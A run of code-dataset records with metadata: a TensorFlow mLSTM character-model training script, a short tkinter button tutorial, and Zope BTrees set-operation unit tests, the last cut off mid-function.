For the sequence AUG GGU GGC AAA CUA UAG UCG CGG UGA print the corresponding amino acid sequence (on a single line, without spaces), using the above defined geneticCode.\n\n","sub_path":"exercises/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"355394325","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os\nimport sys\nimport numpy as np\nimport argparse\nimport random\nimport tensorflow as tf\nimport pprint\nimport time\nimport io\nfrom Utilities import DataLoader\nimport caffeine\n\n\nparser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--data_dir', type=str, default=None,\n help='Path to training data directory') # not optional\nparser.add_argument('--saved_models_dir', type=str, default='saved_models',\n help='Name of directory to save models during training')\nparser.add_argument('--log_dir', type=str, default='tensorboard_logs',\n help='Name of directory for storing tensorboard logs')\nparser.add_argument('--rnn_size', type=int, default=128,\n help='Size of RNN hidden states')\nparser.add_argument('--batch_size', type=int, default=32,\n help='RNN minibatch size')\nparser.add_argument('--seq_length', type=int, default=32,\n help='RNN sequence length')\nparser.add_argument('--num_epochs', type=int, default=1,\n help='Number of training epochs')\nparser.add_argument('--init_lr', type=float, default=5*10**-4, # value from paper\n help='Initial learning rate')\nparser.add_argument('--embedding_size', type=int, default=64,\n help='Character embedding layer size')\nparser.add_argument('--wn', type=int, default=1,\n help='Switch for weight normalisation on the mLSTM parameters. Integer argument of 1 for ON and 0 for OFF')\nparser.add_argument('--restore_path', type= str, default=None,\n help='Path to a directory from which to restore a model from previous session')\nparser.add_argument('--summary_frequency', type=int, default=100,\n help='Save tensorboard data every N steps')\nparser.add_argument('--sampling_frequency', type=int, default=100,\n help='Generate samples from the model during training every N steps ')\nparser.add_argument('--num_chars', type=int, default=250,\n help='Option to specify how many chars to sample from the model if --sampling_frequency is not zero ')\nparser.add_argument('--lr_decay', type=int, default=1,\n help='Switch for learning rate decay. 
Integer argument of 1 for ON and 0 for OFF, learning rate is decayed to zero over the total number of updates')\nparser.add_argument('--np_path', type=str, default=None,\n help='Path to directory of numpy weights to restore model from')\n\nargs = parser.parse_args()\n\nrnn_size = args.rnn_size\nbatch_size = args.batch_size\nseq_length = args.seq_length\nembedding_size = args.embedding_size\n\n# preprocess the input data and create batches\ndata_dir =args.data_dir\n\nloader = DataLoader(data_dir, batch_size, seq_length)\n\nvocabulary_size = 256 # byte\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n\n \n #-----------------------------------------------------------------------------\n # restore from numpy weights\n if args.np_path is not None:\n # read in from the 15 numpy weights files\n params = [np.load(args.np_path + '/%d.npy'%i) for i in range(15)]\n wx = np.split(params[1], 4, 1)\n b = np.split(params[8], 4)\n gx = np.split(params[9], 4)\n gm = np.split(params[10], 4)\n\n # Load weights into variables\n W_embedding = tf.get_variable(\"W_embedding\", initializer=tf.constant(params[0]))\n\n Wmx = tf.get_variable(\"Wmx\", initializer=tf.constant(params[6]))\n Wmh = tf.get_variable(\"Wmh\", initializer=tf.constant(params[7]))\n \n Whx = tf.get_variable(\"Whx\", initializer=tf.constant(wx[3]))\n Whm = tf.get_variable(\"Whm\", initializer=tf.constant(params[5]))\n Whb = tf.get_variable(\"Whb\", initializer=tf.constant(np.expand_dims(b[3], axis=0)))\n\n Wix = tf.get_variable(\"Wix\", initializer=tf.constant(wx[0]))\n Wim = tf.get_variable(\"Wim\", initializer=tf.constant(params[2]))\n Wib = tf.get_variable(\"Wib\", initializer=tf.constant(np.expand_dims(b[0], axis=0)))\n\n Wox = tf.get_variable(\"Wox\", initializer=tf.constant(wx[2]))\n Wom = tf.get_variable(\"Wom\", initializer=tf.constant(params[4]))\n Wob = tf.get_variable(\"Wob\", initializer=tf.constant(np.expand_dims(b[2], axis=0)))\n\n Wfx = tf.get_variable(\"Wfx\", initializer=tf.constant(wx[1]))\n Wfm = tf.get_variable(\"Wfm\", initializer=tf.constant(params[3]))\n Wfb = tf.get_variable(\"Wfb\", initializer=tf.constant(np.expand_dims(b[1], axis=0)))\n\n gmx = tf.get_variable(\"gmx\", initializer=tf.constant(params[11]))\n gmh = tf.get_variable(\"gmh\", initializer=tf.constant(params[12]))\n\n ghx = tf.get_variable(\"ghx\", initializer=tf.constant(gx[3]))\n ghm = tf.get_variable(\"ghm\", initializer=tf.constant(gm[3]))\n\n gix = tf.get_variable(\"gix\", initializer=tf.constant(gx[0]))\n gim = tf.get_variable(\"gim\", initializer=tf.constant(gm[0]))\n\n gox = tf.get_variable(\"gox\", initializer=tf.constant(gx[2]))\n gom = tf.get_variable(\"gom\", initializer=tf.constant(gm[2]))\n\n gfx = tf.get_variable(\"gfx\", initializer=tf.constant(gx[1]))\n gfm = tf.get_variable(\"gfm\", initializer=tf.constant(gm[1])) \n\n Classifier_w = tf.get_variable(\"Classifier_w\", initializer=tf.constant(params[13]))\n Classifier_b = tf.get_variable(\"Classifier_b\", initializer=tf.constant(params[14])) \n\n pprint.pprint([W_embedding, Wmx, Wmh, Whx, Whm, Whb, Wix, Wim, Wib, Wox, Wom, Wob, \n Wfx, Wfm, Wfb, gmx, gmh, ghx, ghm, gix, gim, gox, gom, gfx, gfm, Classifier_w, Classifier_b] )\n\n print('Restored from Numpy weights at: ', args.np_path)\n #-----------------------------------------------------------------------------\n else:\n # weight matrix for character embedding\n W_embedding = tf.Variable(tf.truncated_normal([vocabulary_size, embedding_size], -0.1, 0.1),name = 'W_embedding')\n\n # mt = (Wmxxt) ⊙ (Wmhht−1) - equation 18\n Wmx = 
tf.Variable(tf.truncated_normal([embedding_size, rnn_size], -0.1, 0.1),name = 'Wmx')\n Wmh = tf.Variable(tf.truncated_normal([rnn_size, rnn_size], -0.1, 0.1), name = 'Wmh')\n\n # hˆt = Whxxt + Whmmt\n Whx = tf.Variable(tf.truncated_normal([embedding_size, rnn_size], -0.1, 0.1),name = 'Whx')\n Whm = tf.Variable(tf.truncated_normal([rnn_size, rnn_size], -0.1, 0.1),name = 'Whm')\n Whb = tf.Variable(tf.zeros([1, rnn_size]),name = 'Whb')\n\n # it = σ(Wixxt + Wimmt)\n Wix = tf.Variable(tf.truncated_normal([embedding_size, rnn_size], -0.1, 0.1),name = 'Wix')\n Wim = tf.Variable(tf.truncated_normal([rnn_size, rnn_size], -0.1, 0.1),name = 'Wim')\n Wib = tf.Variable(tf.zeros([1, rnn_size]),name = 'Wib')\n\n # ot = σ(Woxxt + Wommt)\n Wox = tf.Variable(tf.truncated_normal([embedding_size, rnn_size], -0.1, 0.1),name = 'Wox')\n Wom = tf.Variable(tf.truncated_normal([rnn_size, rnn_size], -0.1, 0.1),name = 'Wom')\n Wob = tf.Variable(tf.zeros([1, rnn_size]),name = 'Wob')\n\n # ft =σ(Wfxxt +Wfmmt)\n Wfx = tf.Variable(tf.truncated_normal([embedding_size, rnn_size], -0.1, 0.1),name = 'Wfx')# Wox\n Wfm = tf.Variable(tf.truncated_normal([rnn_size, rnn_size], -0.1, 0.1),name = 'Wfm')# Woh\n Wfb = tf.Variable(tf.zeros([1, rnn_size]),name = 'Wfb')\n\n # define the g parameters for weight normalization if wn switch is on\n if args.wn == 1:\n\n gmx = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gmx')\n gmh = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gmh')\n\n ghx = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='ghx')\n ghm = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='ghm')\n\n gix = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gix')\n gim = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gim')\n\n gox = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gox')\n gom = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gom')\n\n gfx = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gfx')\n gfm = tf.Variable(tf.truncated_normal([rnn_size], -0.1, 0.1),name='gfm')\n\n\n # normalized weights\n Wmx = tf.nn.l2_normalize(Wmx, dim=0)*gmx\n Wmh = tf.nn.l2_normalize(Wmh, dim=0)*gmh\n\n Whx = tf.nn.l2_normalize(Whx,dim=0)*ghx\n Whm = tf.nn.l2_normalize(Whm,dim=0)*ghm\n\n Wix = tf.nn.l2_normalize(Wix,dim=0)*gix\n Wim = tf.nn.l2_normalize(Wim,dim=0)*gim\n\n Wox = tf.nn.l2_normalize(Wox,dim=0)*gox\n Wom = tf.nn.l2_normalize(Wom,dim=0)*gom\n\n Wfx = tf.nn.l2_normalize(Wfx,dim=0)*gfx\n Wfm = tf.nn.l2_normalize(Wfm,dim=0)*gfm\n\n # Classifier weights and biases.\n Classifier_w = tf.Variable(tf.truncated_normal([rnn_size, vocabulary_size], -0.1, 0.1),name='Classifier_w')\n Classifier_b = tf.Variable(tf.zeros([vocabulary_size]),name='Classifier_b')\n\n\n # Variables for saving state across unrolled network.\n saved_output = tf.Variable(tf.zeros([batch_size, rnn_size]),name='saved_output', trainable=False)\n saved_state = tf.Variable(tf.zeros([batch_size, rnn_size]),name='saved_state', trainable=False)\n\n # placeholder for the inputs and the targets\n inputs = tf.placeholder(tf.int32, shape=[batch_size, seq_length],name='inputs')\n targets = tf.placeholder(tf.int32, shape=[batch_size, seq_length],name='targets') # targets for the lm\n\n # for the targets\n one_hot_labels = tf.one_hot(targets, vocabulary_size)\n labels_split_ = tf.split(one_hot_labels, seq_length, axis=1)\n list_labels = [tf.squeeze(input_, [1]) for input_ in labels_split_]\n\n # for the inputs\n embedded_inputs = 
tf.nn.embedding_lookup(W_embedding,inputs)\n inputs_split_ = tf.split(embedded_inputs, seq_length, axis=1)\n list_inputs = [tf.squeeze(input_, [1]) for input_ in inputs_split_]\n\n def mlstm_cell(x, h, c):\n \"\"\"\n multiplicative LSTM cell. https://arxiv.org/pdf/1609.07959.pdf\n\n \"\"\"\n # mt = (Wmxxt) ⊙ (Wmhht−1) - equation 18\n mt = tf.matmul(x,Wmx) * tf.matmul(h,Wmh)\n # hˆt = Whxxt + Whmmt\n ht = tf.tanh(tf.matmul(x,Whx) + tf.matmul(mt,Whm) + Whb)\n # it = σ(Wixxt + Wimmt)\n it = tf.sigmoid(tf.matmul(x,Wix) + tf.matmul(mt,Wim)+ Wib)\n # ot = σ(Woxxt + Wommt)\n ot = tf.sigmoid(tf.matmul(x,Wox) + tf.matmul(mt,Wom)+ Wob)\n # ft =σ(Wfxxt +Wfmmt)\n ft = tf.sigmoid(tf.matmul(x,Wfx) + tf.matmul(mt,Wfm)+ Wfb)\n\n c_new = (ft * c) + (it * ht)\n \n\n h_new = tf.tanh(c_new) * ot\n\n return h_new, c_new\n\n # Unrolled LSTM loop.\n outputs = list()\n output = saved_output # these are initially zero\n state = saved_state\n for i in list_inputs:\n output, state = mlstm_cell(i, output, state)\n outputs.append(output)\n\n with tf.control_dependencies([saved_output.assign(output), saved_state.assign(state)]):\n # Classifier.\n logits = tf.nn.xw_plus_b(tf.concat(outputs, 0), Classifier_w, Classifier_b)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=tf.concat(list_labels, 0), logits=logits),name='loss')\n perplexity = tf.exp(loss)\n\n # Optimizer.\n global_step = tf.Variable(0, name='global_step', trainable=False)\n learning_rate = tf.placeholder(tf.float32, shape=[])\n init_lr = args.init_lr\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n gradients, v = zip(*optimizer.compute_gradients(loss))\n optimizer = optimizer.apply_gradients(zip(gradients, v), global_step=global_step, name= 'optimizer_op')\n\n # Predictions.\n train_prediction = tf.nn.softmax(logits)\n\n # Sampling code.\n sample_input = tf.placeholder(tf.int32, shape=(1,), name = 'sample_input')\n sample_embedding= tf.nn.embedding_lookup(W_embedding,sample_input)\n saved_sample_output = tf.Variable(tf.zeros([1, rnn_size]),name = 'saved_sample_output')\n saved_sample_state = tf.Variable(tf.zeros([1, rnn_size]),name = 'saved_sample_state')\n\n reset_sample_state = tf.group(saved_sample_output.assign(tf.zeros([1, rnn_size])), saved_sample_state.assign(tf.zeros([1, rnn_size])),name='reset_sample_state_op')\n\n sample_output, sample_state = mlstm_cell(sample_embedding, saved_sample_output, saved_sample_state)\n\n with tf.control_dependencies([saved_sample_output.assign(sample_output),saved_sample_state.assign(sample_state)]):\n sample_prediction = tf.nn.softmax(tf.nn.xw_plus_b(sample_output, Classifier_w, Classifier_b), name = 'sample_prediction')\n\n# Summaries for tensorboard\ntf.summary.scalar('train_loss', loss)\ntf.summary.scalar('perplexity', perplexity)\ntf.summary.scalar('learning_rate', learning_rate)\n\nwith tf.Session(graph=graph) as session:\n\n saver = tf.train.Saver()\n\n # initialize variables before restoring from saved model\n tf.global_variables_initializer().run()\n print('Variables Initialized')\n\n # restore from model file\n if args.restore_path is not None:\n saver.restore(session, tf.train.latest_checkpoint(args.restore_path))\n print('Restored from model dir: ', args.restore_path)\n \n summaries = tf.summary.merge_all()\n print('Summaries Merged')\n\n # timestamp for saving the run\n timestamp = time.strftime(\"%Y-%m-%d-%H-%M-%S\")\n\n # writer for saving tensorboard logs\n writer = tf.summary.FileWriter(os.path.join(args.log_dir, timestamp))\n writer.add_graph(session.graph)\n\n 
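# NOTE: with --lr_decay on, the loop below decays the rate linearly, lr(step) = init_lr * (1 - step/num_batches);\n# e.g. init_lr=5e-4 with num_batches=1000 gives lr=2.5e-4 at step 500 and 0 at step 1000.\n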
for epoch in xrange(args.num_epochs):\n\n loader.reset_batch_pointer()\n\n for batch in xrange(loader.num_batches):\n\n gs = session.run(global_step)\n start = time.time()\n x,y = loader.next_batch()\n\n if args.lr_decay == 1:\n\n lr = init_lr-(((gs)*init_lr)/loader.num_batches) # linearly decay the learning rate to zero over the number of updates\n\n _,l,perp,summary=session.run([optimizer, loss, perplexity, summaries], feed_dict={inputs:x, targets:y,learning_rate:lr})\n\n else:\n\n _,l,perp,summary=session.run([optimizer, loss, perplexity, summaries], feed_dict={inputs:x, targets:y,learning_rate:init_lr})\n\n end = time.time()\n\n print(\"Global step: {}, progress: ({}/{}), train_loss = {:.3f}, train_perplexity = {:.3f} time/batch = {:.3f}\"\n .format(gs,epoch * loader.num_batches + batch,args.num_epochs * loader.num_batches,l, perp, end - start))\n\n # write the summaries to the log_dir for tensorboard\n if args.summary_frequency != 0:\n if (batch % args.summary_frequency == 0):\n start = time.time()\n writer.add_summary(summary, gs)\n end = time.time()\n print('Writing Summaries...', 'time = ', end - start)\n\n # sample from the model\n if args.sampling_frequency !=0:\n\n if batch % args.sampling_frequency == 0:\n start = time.time()\n print('Sampling...')\n\n feed = np.array(random.sample(xrange(vocabulary_size),1), dtype='int32') # random seed\n sentence = unicode('')\n\n print('='*100)\n\n for _ in xrange(args.num_chars): # can change number of characters to sample here\n\n prediction = session.run(sample_prediction, feed_dict = {sample_input: feed})\n feed = np.expand_dims(np.random.choice(xrange(vocabulary_size), p=prediction.ravel()),axis=0)\n sentence += unichr(feed)\n\n print(sentence)\n end = time.time()\n\n print('='*100)\n print('Sampling time = ', end - start)\n\n # save samples\n sample_dir = os.path.join('sample_logs',timestamp)\n\n if not os.path.exists(sample_dir):\n os.makedirs(sample_dir)\n sample_file = os.path.join(sample_dir,'samples')\n\n with io.open(sample_file, 'a+', encoding='utf-8') as f:\n f.write('\\n' + 'GLOBAL_STEP: ' + str(gs) + '\\n' + sentence)\n\n # save the fully trained model on the way out\n save_dir = os.path.join(args.saved_models_dir,timestamp)\n os.makedirs(save_dir)\n checkpoint_path = os.path.join(save_dir, 'model')\n saver.save(session, checkpoint_path, global_step=gs)\n print('Model Saved')\n","sub_path":"train_mLSTM.py","file_name":"train_mLSTM.py","file_ext":"py","file_size_in_byte":16816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"256393587","text":"\"\"\"\r\nTitle: tutorial_3.py\r\nDate: 9/24/2019\r\nCreated by: Kristopher Ward\r\nRevisions:\r\n\r\nPurpose:\r\n To teach basic tKinter\r\n\"\"\"\r\n\r\n# libraries\r\nimport tkinter as tk\r\n\r\nclass myGUI:\r\n def __init__(self):\r\n self.master = tk.Tk()\r\n\r\n self.button = tk.Button(self.master, text=\"button1\", bg=\"blue\", fg=\"white\", command=self.func_button_1)\r\n self.button.pack()\r\n self.button_2 = tk.Button(self.master, text=\"button2\", bg=\"red\", command=self.func_button_2)\r\n self.button_2.pack()\r\n def func_button_1(self):\r\n print(\"I am button 1\")\r\n def func_button_2(self):\r\n print(\"I am not button 1 but I'm button 2\")\r\n\r\nif __name__ == \"__main__\":\r\n myWindow = myGUI()\r\n 
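# mainloop() below blocks, dispatching Tk events (such as the button callbacks above) until the window is closed\r\n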
myWindow.master.mainloop()\r\n","sub_path":"tutorial_3.py","file_name":"tutorial_3.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168598151","text":"##############################################################################\n#\n# Copyright (c) 2002 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE\n#\n##############################################################################\nimport random\nfrom unittest import TestCase, TestSuite, TextTestRunner, makeSuite\n\nfrom BTrees.OOBTree import OOBTree, OOBucket, OOSet, OOTreeSet\nfrom BTrees.IOBTree import IOBTree, IOBucket, IOSet, IOTreeSet\nfrom BTrees.IIBTree import IIBTree, IIBucket, IISet, IITreeSet\nfrom BTrees.OIBTree import OIBTree, OIBucket, OISet, OITreeSet\n\n# Subclasses have to set up:\n# builders - functions to build inputs, taking an optional keys arg\n# intersection, union, difference - set to the type-correct versions\nclass SetResult(TestCase):\n def setUp(self):\n self.Akeys = [1, 3, 5, 6 ]\n self.Bkeys = [ 2, 3, 4, 6, 7]\n self.As = [makeset(self.Akeys) for makeset in self.builders]\n self.Bs = [makeset(self.Bkeys) for makeset in self.builders]\n self.emptys = [makeset() for makeset in self.builders]\n\n # Slow but obviously correct Python implementations of basic ops.\n def _union(self, x, y):\n result = list(x.keys())\n for e in y.keys():\n if e not in result:\n result.append(e)\n result.sort()\n return result\n\n def _intersection(self, x, y):\n result = []\n ykeys = y.keys()\n for e in x.keys():\n if e in ykeys:\n result.append(e)\n return result\n\n def _difference(self, x, y):\n result = list(x.keys())\n for e in y.keys():\n if e in result:\n result.remove(e)\n # Difference preserves LHS values.\n if hasattr(x, \"values\"):\n result = [(k, x[k]) for k in result]\n return result\n\n def testNone(self):\n for op in self.union, self.intersection, self.difference:\n C = op(None, None)\n self.assert_(C is None)\n\n for op in self.union, self.intersection, self.difference:\n for A in self.As:\n C = op(A, None)\n self.assert_(C is A)\n\n C = op(None, A)\n if op is self.difference:\n self.assert_(C is None)\n else:\n self.assert_(C is A)\n\n def testEmptyUnion(self):\n for A in self.As:\n for E in self.emptys:\n C = self.union(A, E)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), self.Akeys)\n\n C = self.union(E, A)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), self.Akeys)\n\n def testEmptyIntersection(self):\n for A in self.As:\n for E in self.emptys:\n C = self.intersection(A, E)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), [])\n\n C = self.intersection(E, A)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), [])\n\n def testEmptyDifference(self):\n for A in self.As:\n for E in self.emptys:\n C = self.difference(A, E)\n # Difference preserves LHS values.\n self.assertEqual(hasattr(C, \"values\"), hasattr(A, \"values\"))\n if hasattr(A, \"values\"):\n self.assertEqual(list(C.items()), list(A.items()))\n else:\n 
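# set-like inputs carry no values, so only the keys can be compared\n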
self.assertEqual(list(C), self.Akeys)\n\n C = self.difference(E, A)\n self.assertEqual(hasattr(C, \"values\"), hasattr(E, \"values\"))\n self.assertEqual(list(C.keys()), [])\n\n def testUnion(self):\n inputs = self.As + self.Bs\n for A in inputs:\n for B in inputs:\n C = self.union(A, B)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), self._union(A, B))\n\n def testIntersection(self):\n inputs = self.As + self.Bs\n for A in inputs:\n for B in inputs:\n C = self.intersection(A, B)\n self.assert_(not hasattr(C, \"values\"))\n self.assertEqual(list(C), self._intersection(A, B))\n\n def testDifference(self):\n inputs = self.As + self.Bs\n for A in inputs:\n for B in inputs:\n C = self.difference(A, B)\n # Difference preserves LHS values.\n self.assertEqual(hasattr(C, \"values\"), hasattr(A, \"values\"))\n want = self._difference(A, B)\n if hasattr(A, \"values\"):\n self.assertEqual(list(C.items()), want)\n else:\n self.assertEqual(list(C), want)\n\n def testLargerInputs(self):\n from random import randint\n MAXSIZE = 200\n MAXVAL = 400\n for i in range(3):\n n = randint(0, MAXSIZE)\n Akeys = [randint(1, MAXVAL) for j in range(n)]\n As = [makeset(Akeys) for makeset in self.builders]\n Akeys = IISet(Akeys)\n\n n = randint(0, MAXSIZE)\n Bkeys = [randint(1, MAXVAL) for j in range(n)]\n Bs = [makeset(Bkeys) for makeset in self.builders]\n Bkeys = IISet(Bkeys)\n\n for op, simulator in ((self.union, self._union),\n (self.intersection, self._intersection),\n (self.difference, self._difference)):\n for A in As:\n for B in Bs:\n got = op(A, B)\n want = simulator(Akeys, Bkeys)\n self.assertEqual(list(got.keys()), want,\n (A, B,\n Akeys, Bkeys,\n list(got.keys()), want))\n\n# Given a mapping builder (IIBTree, OOBucket, etc), return a function\n# that builds an object of that type given only a list of keys.\ndef makeBuilder(mapbuilder):\n def result(keys=[], mapbuilder=mapbuilder):\n return mapbuilder(zip(keys, keys))\n return result\n\nclass PureII(SetResult):\n from BTrees.IIBTree import union, intersection, difference\n builders = IISet, IITreeSet, makeBuilder(IIBTree), makeBuilder(IIBucket)\n\nclass PureIO(SetResult):\n from BTrees.IOBTree import union, intersection, difference\n builders = IOSet, IOTreeSet, makeBuilder(IOBTree), makeBuilder(IOBucket)\n\nclass PureOO(SetResult):\n from BTrees.OOBTree import union, intersection, difference\n builders = OOSet, OOTreeSet, makeBuilder(OOBTree), makeBuilder(OOBucket)\n\nclass PureOI(SetResult):\n from BTrees.OIBTree import union, intersection, difference\n builders = OISet, OITreeSet, makeBuilder(OIBTree), makeBuilder(OIBucket)\n\n# Subclasses must set up (as class variables):\n# multiunion, union\n# mkset, mktreeset\n# mkbucket, mkbtree\nclass MultiUnion(TestCase):\n\n def testEmpty(self):\n self.assertEqual(len(self.multiunion([])), 0)\n\n def testOne(self):\n for sequence in [3], range(20), range(-10, 0, 2) + range(1, 10, 2):\n seq1 = sequence[:]\n seq2 = sequence[:]\n seq2.reverse()\n seqsorted = sequence[:]\n seqsorted.sort()\n for seq in seq1, seq2, seqsorted:\n for builder in self.mkset, self.mktreeset:\n input = builder(seq)\n output = self.multiunion([input])\n self.assertEqual(len(seq), len(output))\n self.assertEqual(seqsorted, list(output))\n\n def testValuesIgnored(self):\n for builder in self.mkbucket, self.mkbtree:\n input = builder([(1, 2), (3, 4), (5, 6)])\n output = self.multiunion([input])\n self.assertEqual([1, 3, 5], list(output))\n\n def testBigInput(self):\n N = 100000\n input = self.mkset(range(N))\n output = 
self.multiunion([input] * 10)\n self.assertEqual(len(output), N)\n self.assertEqual(output.minKey(), 0)\n self.assertEqual(output.maxKey(), N-1)\n self.assertEqual(list(output), range(N))\n\n def testLotsOfLittleOnes(self):\n from random import shuffle\n N = 5000\n inputs = []\n mkset, mktreeset = self.mkset, self.mktreeset\n for i in range(N):\n base = i * 4 - N\n inputs.append(mkset([base, base+1]))\n inputs.append(mktreeset([base+2, base+3]))\n shuffle(inputs)\n output = self.multiunion(inputs)\n self.assertEqual(len(output), N*4)\n self.assertEqual(list(output), range(-N, 3*N))\n\n def testFunkyKeyIteration(self):\n # The internal set iteration protocol allows \"iterating over\" a\n # a single key as if it were a set.\n N = 100\n union, mkset = self.union, self.mkset\n slow = mkset()\n for i in range(N):\n slow = union(slow, mkset([i]))\n fast = self.multiunion(range(N)) # acts like N distinct singleton sets\n self.assertEqual(len(slow), N)\n self.assertEqual(len(fast), N)\n self.assertEqual(list(slow.keys()), list(fast.keys()))\n self.assertEqual(list(fast.keys()), range(N))\n\nclass TestIIMultiUnion(MultiUnion):\n from BTrees.IIBTree import multiunion, union\n from BTrees.IIBTree import IISet as mkset, IITreeSet as mktreeset\n from BTrees.IIBTree import IIBucket as mkbucket, IIBTree as mkbtree\n\nclass TestIOMultiUnion(MultiUnion):\n from BTrees.IOBTree import multiunion, union\n from BTrees.IOBTree import IOSet as mkset, IOTreeSet as mktreeset\n from BTrees.IOBTree import IOBucket as mkbucket, IOBTree as mkbtree\n\n# Check that various special module functions are and aren't imported from\n# the expected BTree modules.\nclass TestImports(TestCase):\n def testWeightedUnion(self):\n from BTrees.IIBTree import weightedUnion\n from BTrees.OIBTree import weightedUnion\n\n try:\n from BTrees.IOBTree import weightedUnion\n except ImportError:\n pass\n else:\n self.fail(\"IOBTree shouldn't have weightedUnion\")\n\n try:\n from BTrees.OOBTree import weightedUnion\n except ImportError:\n pass\n else:\n self.fail(\"OOBTree shouldn't have weightedUnion\")\n\n def testWeightedIntersection(self):\n from BTrees.IIBTree import weightedIntersection\n from BTrees.OIBTree import weightedIntersection\n\n try:\n from BTrees.IOBTree import weightedIntersection\n except ImportError:\n pass\n else:\n self.fail(\"IOBTree shouldn't have weightedIntersection\")\n\n try:\n from BTrees.OOBTree import weightedIntersection\n except ImportError:\n pass\n else:\n self.fail(\"OOBTree shouldn't have weightedIntersection\")\n\n\n def testMultiunion(self):\n from BTrees.IIBTree import multiunion\n from BTrees.IOBTree import multiunion\n\n try:\n from BTrees.OIBTree import multiunion\n except ImportError:\n pass\n else:\n self.fail(\"OIBTree shouldn't have multiunion\")\n\n try:\n from BTrees.OOBTree import multiunion\n except ImportError:\n pass\n else:\n self.fail(\"OOBTree shouldn't have multiunion\")\n\n# Subclasses must set up (as class variables):\n# weightedUnion, weightedIntersection\n# builders -- sequence of constructors, taking items\n# union, intersection -- the module routines of those names\n# mkbucket -- the module bucket builder\nclass Weighted(TestCase):\n\n def setUp(self):\n self.Aitems = [(1, 10), (3, 30), (5, 50), (6, 60)]\n self.Bitems = [(2, 21), (3, 31), (4, 41), (6, 61), (7, 71)]\n\n self.As = [make(self.Aitems) for make in self.builders]\n self.Bs = [make(self.Bitems) for make in self.builders]\n self.emptys = [make([]) for make in self.builders]\n\n weights = []\n for w1 in -3, -1, 0, 1, 7:\n 
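# exercise every weight pair, including negative and zero weights\n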
for w2 in -3, -1, 0, 1, 7:\n weights.append((w1, w2))\n self.weights = weights\n\n def testBothNone(self):\n for op in self.weightedUnion, self.weightedIntersection:\n w, C = op(None, None)\n self.assert_(C is None)\n self.assertEqual(w, 0)\n\n w, C = op(None, None, 42, 666)\n self.assert_(C is None)\n self.assertEqual(w, 0)\n\n def testLeftNone(self):\n for op in self.weightedUnion, self.weightedIntersection:\n for A in self.As + self.emptys:\n w, C = op(None, A)\n self.assert_(C is A)\n self.assertEqual(w, 1)\n\n w, C = op(None, A, 42, 666)\n self.assert_(C is A)\n self.assertEqual(w, 666)\n\n def testRightNone(self):\n for op in self.weightedUnion, self.weightedIntersection:\n for A in self.As + self.emptys:\n w, C = op(A, None)\n self.assert_(C is A)\n self.assertEqual(w, 1)\n\n w, C = op(A, None, 42, 666)\n self.assert_(C is A)\n self.assertEqual(w, 42)\n\n # If obj is a set, return a bucket with values all 1; else return obj.\n def _normalize(self, obj):\n if isaset(obj):\n obj = self.mkbucket(zip(obj.keys(), [1] * len(obj)))\n return obj\n\n # Python simulation of weightedUnion.\n def _wunion(self, A, B, w1=1, w2=1):\n if isaset(A) and isaset(B):\n return 1, self.union(A, B).keys()\n A = self._normalize(A)\n B = self._normalize(B)\n result = []\n for key in self.union(A, B):\n v1 = A.get(key, 0)\n v2 = B.get(key, 0)\n result.append((key, v1*w1 + v2*w2))\n return 1, result\n\n def testUnion(self):\n inputs = self.As + self.Bs + self.emptys\n for A in inputs:\n for B in inputs:\n want_w, want_s = self._wunion(A, B)\n got_w, got_s = self.weightedUnion(A, B)\n self.assertEqual(got_w, want_w)\n if isaset(got_s):\n self.assertEqual(got_s.keys(), want_s)\n else:\n self.assertEqual(got_s.items(), want_s)\n\n for w1, w2 in self.weights:\n want_w, want_s = self._wunion(A, B, w1, w2)\n got_w, got_s = self.weightedUnion(A, B, w1, w2)\n self.assertEqual(got_w, want_w)\n if isaset(got_s):\n self.assertEqual(got_s.keys(), want_s)\n else:\n self.assertEqual(got_s.items(), want_s)\n\n # Python simulation weightedIntersection.\n def _wintersection(self, A, B, w1=1, w2=1):\n if isaset(A) and isaset(B):\n return w1 + w2, self.intersection(A, B).keys()\n A = self._normalize(A)\n B = self._normalize(B)\n result = []\n for key in self.intersection(A, B):\n result.append((key, A[key]*w1 + B[key]*w2))\n return 1, result\n\n def testIntersection(self):\n inputs = self.As + self.Bs + self.emptys\n for A in inputs:\n for B in inputs:\n want_w, want_s = self._wintersection(A, B)\n got_w, got_s = self.weightedIntersection(A, B)\n self.assertEqual(got_w, want_w)\n if isaset(got_s):\n self.assertEqual(got_s.keys(), want_s)\n else:\n self.assertEqual(got_s.items(), want_s)\n\n for w1, w2 in self.weights:\n 